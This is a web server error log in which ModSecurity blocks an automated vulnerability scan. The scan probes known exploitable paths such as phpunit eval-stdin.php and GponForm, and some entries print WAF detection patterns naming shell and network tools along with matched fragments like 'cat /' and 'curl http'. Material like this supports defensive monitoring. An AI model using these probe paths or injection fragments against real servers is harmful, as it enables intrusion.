[Tue May 26 12:51:35.086932 2026] [security2:error] [pid 461618:tid 461793] [client 23.94.40.119:47084] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cobbler_api"] [unique_id "ahVJ_1yiSlSCHr1fdr2aSQAAALI"]
[Tue May 26 12:51:35.212297 2026] [security2:error] [pid 461618:tid 461828] [client 23.94.40.119:47102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vendor/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_1yiSlSCHr1fdr2aTAAAANU"]
[Tue May 26 12:51:35.418198 2026] [security2:error] [pid 461618:tid 461831] [client 23.94.40.119:47106] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/GponForm/diag_Form"] [unique_id "ahVJ_1yiSlSCHr1fdr2aUAAAANg"]
[Tue May 26 12:51:35.484933 2026] [security2:error] [pid 461618:tid 461870] [client 23.94.40.119:47116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_1yiSlSCHr1fdr2aVAAAAP8"]
[Tue May 26 12:51:35.685306 2026] [security2:error] [pid 461618:tid 461835] [client 23.94.40.119:47120] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/GponForm/diag_Form"] [unique_id "ahVJ_1yiSlSCHr1fdr2aWgAAANw"]
[Tue May 26 12:51:35.764390 2026] [security2:error] [pid 461618:tid 461860] [client 23.94.40.119:47128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_1yiSlSCHr1fdr2aXwAAAPU"]
[Tue May 26 12:51:35.952497 2026] [security2:error] [pid 461618:tid 461849] [client 23.94.40.119:47136] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/nagiosql/admin/logbook.php"] [unique_id "ahVJ_1yiSlSCHr1fdr2aYwAAAOo"]
[Tue May 26 12:51:36.020049 2026] [security2:error] [pid 461618:tid 461853] [client 23.94.40.119:47140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAFyiSlSCHr1fdr2aZAAAAO4"]
[Tue May 26 12:51:36.291291 2026] [security2:error] [pid 461618:tid 461816] [client 23.94.40.119:47146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/nagiosql/admin/menuaccess.php"] [unique_id "ahVKAFyiSlSCHr1fdr2abQAAAMk"]
[Tue May 26 12:51:36.308531 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:47160] ModSecurity: Warning. Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "1439"] [id "9009999"] [msg "8 char spam"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/system/sharedir.php"] [unique_id "ahVKAFyiSlSCHr1fdr2abwAAAMo"]
[Tue May 26 12:51:36.403699 2026] [security2:error] [pid 461618:tid 461774] [client 23.94.40.119:47170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVKAFyiSlSCHr1fdr2adgAAAJ8"]
[Tue May 26 12:51:36.488521 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:47160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/system/sharedir.php"] [unique_id "ahVKAFyiSlSCHr1fdr2abwAAAMo"]
[Tue May 26 12:51:36.549914 2026] [security2:error] [pid 461618:tid 461824] [client 23.94.40.119:47174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/modules/attributewizardpro/file_upload.php"] [unique_id "ahVKAFyiSlSCHr1fdr2adwAAANE"]
[Tue May 26 12:51:36.678012 2026] [security2:error] [pid 461618:tid 461804] [client 23.94.40.119:47178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAFyiSlSCHr1fdr2afgAAAL0"]
[Tue May 26 12:51:36.762500 2026] [security2:error] [pid 461618:tid 461769] [client 23.94.40.119:47190] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/en/php/usb_sync.php"] [unique_id "ahVKAFyiSlSCHr1fdr2afwAAAJo"]
[Tue May 26 12:51:36.936804 2026] [security2:error] [pid 461618:tid 461800] [client 23.94.40.119:47192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVKAFyiSlSCHr1fdr2ahQAAALk"]
[Tue May 26 12:51:37.218732 2026] [security2:error] [pid 461618:tid 461821] [client 23.94.40.119:47206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAVyiSlSCHr1fdr2akgAAAM4"]
[Tue May 26 12:51:37.521363 2026] [security2:error] [pid 461618:tid 461798] [client 23.94.40.119:47212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/pandora_console/ajax.php"] [unique_id "ahVKAVyiSlSCHr1fdr2algAAALc"]
[Tue May 26 12:51:37.526080 2026] [security2:error] [pid 461618:tid 461863] [client 23.94.40.119:47228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVKAVyiSlSCHr1fdr2alwAAAPg"]
[Tue May 26 12:51:37.609692 2026] [security2:error] [pid 461618:tid 461840] [client 23.94.40.119:47238] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/upload/index.php"] [unique_id "ahVKAVyiSlSCHr1fdr2anAAAAOE"]
[Tue May 26 12:51:37.794981 2026] [security2:error] [pid 461618:tid 461859] [client 23.94.40.119:51866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAVyiSlSCHr1fdr2aqAAAAPQ"]
[Tue May 26 12:51:38.040137 2026] [security2:error] [pid 461618:tid 461814] [client 23.94.40.119:51886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/change_config.php"] [unique_id "ahVKAlyiSlSCHr1fdr2aqgAAAMc"]
[Tue May 26 12:51:38.092732 2026] [security2:error] [pid 461618:tid 461756] [client 23.94.40.119:51900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAlyiSlSCHr1fdr2argAAAI0"]
[Tue May 26 12:51:38.210782 2026] [security2:error] [pid 461618:tid 461758] [client 23.94.40.119:51908] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/photo-gallery/api/photo/search/"] [unique_id "ahVKAlyiSlSCHr1fdr2aswAAAI8"]
[Tue May 26 12:51:38.249828 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:51922] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "text/x-gwt-rpc"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/avi/avigui/avigwt"] [unique_id "ahVKAlyiSlSCHr1fdr2auQAAAJI"]
[Tue May 26 12:51:38.321183 2026] [security2:error] [pid 461618:tid 461750] [client 23.94.40.119:51924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/change_config.php"] [unique_id "ahVKAlyiSlSCHr1fdr2avQAAAIc"]
[Tue May 26 12:51:38.354457 2026] [security2:error] [pid 461618:tid 461869] [client 23.94.40.119:51934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAlyiSlSCHr1fdr2avgAAAP4"]
[Tue May 26 12:51:38.583528 2026] [security2:error] [pid 461618:tid 461855] [client 23.94.40.119:51950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/setup.php"] [unique_id "ahVKAlyiSlSCHr1fdr2ayAAAAPA"]
[Tue May 26 12:51:38.618791 2026] [security2:error] [pid 461618:tid 461815] [client 23.94.40.119:51964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAlyiSlSCHr1fdr2azQAAAMg"]
[Tue May 26 12:51:38.653891 2026] [security2:error] [pid 461618:tid 461792] [client 23.94.40.119:51974] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/api/external/7.0/system.System.get_infos"] [unique_id "ahVKAlyiSlSCHr1fdr2a0QAAALE"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:38.744277 2026] [cgid:error] [pid 461618:tid 461849] [client 23.94.40.119:51984] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/DownloadCfg: script not found or unable to stat
[Tue May 26 12:51:38.891010 2026] [security2:error] [pid 461618:tid 461820] [client 23.94.40.119:51992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAlyiSlSCHr1fdr2a2wAAAM0"]
[Tue May 26 12:51:39.019773 2026] [security2:error] [pid 461618:tid 461782] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKAlyiSlSCHr1fdr2axwAAAKc"]
[Tue May 26 12:51:39.147587 2026] [security2:error] [pid 461618:tid 461822] [client 23.94.40.119:52016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKA1yiSlSCHr1fdr2a5AAAAM8"]
[Tue May 26 12:51:39.558914 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:52018] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "image/jp2"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/meta"] [unique_id "ahVKA1yiSlSCHr1fdr2a7gAAAJI"]
[Tue May 26 12:51:41.471221 2026] [security2:error] [pid 461618:tid 461835] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKBVyiSlSCHr1fdr2bHQAAANw"]
[Tue May 26 12:51:41.737338 2026] [security2:error] [pid 461618:tid 461839] [client 23.94.40.119:52022] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/filemanager/upload.php"] [unique_id "ahVKBVyiSlSCHr1fdr2bMQAAAOA"]
[Tue May 26 12:51:42.787656 2026] [security2:error] [pid 461618:tid 461860] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKBlyiSlSCHr1fdr2bTgAAAPU"], referer: https://www.anujtradingco.com/
[Tue May 26 12:51:42.792672 2026] [security2:error] [pid 461618:tid 461792] [client 157.20.138.61:54508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKBlyiSlSCHr1fdr2bRQAAALE"]
[Tue May 26 12:51:42.792872 2026] [security2:error] [pid 461618:tid 461792] [client 157.20.138.61:54508] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKBlyiSlSCHr1fdr2bRQAAALE"]
[Tue May 26 12:51:43.166310 2026] [security2:error] [pid 461618:tid 461787] [client 23.94.40.119:52058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKB1yiSlSCHr1fdr2bXQAAAKw"]
[Tue May 26 12:51:43.626990 2026] [security2:error] [pid 461618:tid 461831] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKB1yiSlSCHr1fdr2bcAAAANg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285318&moderation-hash=ebe2c4156d943d51100e8ea3501d2963
[Tue May 26 12:51:43.877675 2026] [security2:error] [pid 461618:tid 461757] [client 23.94.40.119:52080] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/upload"] [unique_id "ahVKB1yiSlSCHr1fdr2bdwAAAI4"]
[Tue May 26 12:51:44.100602 2026] [security2:error] [pid 461618:tid 461830] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKB1yiSlSCHr1fdr2bdgAAANc"]
[Tue May 26 12:51:44.482880 2026] [security2:error] [pid 461618:tid 461807] [client 23.94.40.119:52094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:cd|perl|killall|traceroute|python|r(?:pm|sync)|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|lwp-(?:download|request|mirror|rget)|id|uname|cvs|svn|(?:s|r)(?:cp|sh)|n(?:et(?:stat|cat)|asm)|rexec|smbclient|t?ftp|ncftp|curl|telnet|g(?:c ..." at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "582"] [id "340023"] [rev "6"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  remote command execution"] [data "cat /"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/fuel/pages/select/"] [unique_id "ahVKCFyiSlSCHr1fdr2bkwAAAMA"]
[Tue May 26 12:51:44.642164 2026] [security2:error] [pid 461618:tid 461866] [client 23.94.40.119:52102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/web/google_analytics.php"] [unique_id "ahVKCFyiSlSCHr1fdr2bmAAAAPs"]
[Tue May 26 12:51:45.030133 2026] [security2:error] [pid 461618:tid 461754] [client 23.94.40.119:52104] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "curl http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/qsr_server/device/getThumbnail"] [unique_id "ahVKCVyiSlSCHr1fdr2bogAAAIs"]
[Tue May 26 12:51:45.047030 2026] [security2:error] [pid 461618:tid 461842] [client 23.94.40.119:52108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/installer-backup.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bowAAAOM"]
[Tue May 26 12:51:45.063132 2026] [security2:error] [pid 461618:tid 461874] [client 74.249.173.207:6095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bpAAAAQM"]
[Tue May 26 12:51:45.124326 2026] [security2:error] [pid 461618:tid 461867] [client 23.94.40.119:52110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bqAAAAPw"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:45.835454 2026] [security2:error] [pid 461618:tid 461837] [client 23.94.40.119:52178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/type.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bzAAAAN4"]
[Tue May 26 12:51:46.108715 2026] [security2:error] [pid 461618:tid 461855] [client 23.94.40.119:52220] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/public/login.htm"] [unique_id "ahVKClyiSlSCHr1fdr2b1gAAAPA"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:46.121261 2026] [security2:error] [pid 461618:tid 461793] [client 113.211.215.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bwgAAALI"]
[Tue May 26 12:51:46.199467 2026] [security2:error] [pid 461618:tid 461801] [client 23.94.40.119:52230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/data/cache_template/rss.tpl.php"] [unique_id "ahVKClyiSlSCHr1fdr2b2wAAALo"]
[Tue May 26 12:51:46.302808 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:52246] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wp-payeezy-pay/donate.php"] [unique_id "ahVKClyiSlSCHr1fdr2b3QAAAKE"]
